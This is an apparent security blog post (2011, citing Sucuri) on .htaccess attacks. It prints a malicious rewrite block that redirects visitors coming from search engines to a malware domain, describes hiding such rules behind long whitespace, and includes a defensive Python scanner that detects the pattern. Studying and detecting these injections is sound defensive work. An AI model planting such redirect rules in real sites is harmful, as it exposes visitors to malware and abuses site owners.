Monday, May 30, 2011

Understanding .htaccess attacks – Part 1

Attackers have been abusing the .htaccess file for a while. They use this file to hide malware, to redirect search-engine visitors to their own sites (think blackhat SEO), and for many other purposes (hiding backdoors, injecting content, modifying php.ini values, etc.).
Why do they use the .htaccess file? For multiple reasons. First, .htaccess is a hidden file (its name starts with a “.”), so some site owners might not see it in their FTP clients. Second, it is a powerful file that allows you to make multiple changes to the web server and PHP behavior. This makes a .htaccess attack hard to find and to clean up.

1- Redirecting users coming from search engines to malware
This is the simplest type of .htaccess attack, and the one we see most often. This is what gets added to the .htaccess file of a hacked site:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
..
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ http://villusoftreit.ru/in.cgi?3 [R=301,L]

As you can see, it checks the referrer of anyone visiting the site, and if the user came from a Google search (or Yahoo, Bing, or any other search engine), it redirects the user to a page serving malware (in this example http://villusoftreit.ru/in.cgi?3). Note that if you type the site directly into the address bar of your browser, nothing happens. Why? It makes the attack harder for the site owner to detect, since they will probably type the site name rather than search for it on Google.
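As an added example (not code from the original post), the following Python scanner flags RewriteRules that redirect off-site while guarded by HTTP_REFERER conditions, which is exactly the pattern above. It strips leading whitespace so the padding trick described later in the post does not hide the directive; the sample .htaccess content is constructed from the snippet above, and `example.com` is an assumed stand-in for the site's own hostname.

```python
import re
from urllib.parse import urlparse

# Constructed sample based on the snippet in the post. The second RewriteCond
# is padded with a long run of spaces, mimicking the hiding trick the post describes.
SAMPLE_HTACCESS = """
RewriteEngine On
                                        RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ http://villusoftreit.ru/in.cgi?3 [R=301,L]

# A legitimate, non-referrer-based redirect that should NOT be flagged
RewriteCond %{HTTPS} off
RewriteRule ^(.*)$ https://example.com/$1 [R=301,L]
"""

COND_RE = re.compile(r'^RewriteCond\s+%\{HTTP_REFERER\}\s+(\S+)', re.I)
RULE_RE = re.compile(r'^RewriteRule\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?', re.I)

def find_referrer_redirects(htaccess_text, own_hosts=()):
    """Return a list of (target_url, [referrer_patterns]) for every RewriteRule
    that redirects (R flag) to a host not in own_hosts and is preceded by at
    least one HTTP_REFERER condition. own_hosts is the site's own hostname(s)."""
    findings = []
    pending = []  # HTTP_REFERER patterns seen since the last RewriteRule
    for raw in htaccess_text.splitlines():
        line = raw.strip()  # defeats the leading-whitespace hiding trick
        if not line or line.startswith('#'):
            continue
        m = COND_RE.match(line)
        if m:
            pending.append(m.group(1))
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        target, flags = m.group(2), (m.group(3) or '')
        host = urlparse(target).netloc.lower()
        is_redirect = re.search(r'\bR(=\d+)?\b', flags) is not None
        if pending and is_redirect and host and host not in own_hosts:
            findings.append((target, pending))
        pending = []  # a RewriteRule consumes the conditions before it
    return findings

if __name__ == '__main__':
    for target, refs in find_referrer_redirects(SAMPLE_HTACCESS, own_hosts=('example.com',)):
        print(f'suspicious off-site redirect to {target} when referrer matches {refs}')
```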

Below is another example of the same attack, but this time redirecting to http://globalpoweringgatheringon.com/in.php?n=30 (one of those Hilary Kneber domains). Note that this time they’ve added hundreds of white spaces before the “RewriteCond” to make it harder to spot in a text editor (we removed them below to make it easier to read in the post).

Read more: Sucuri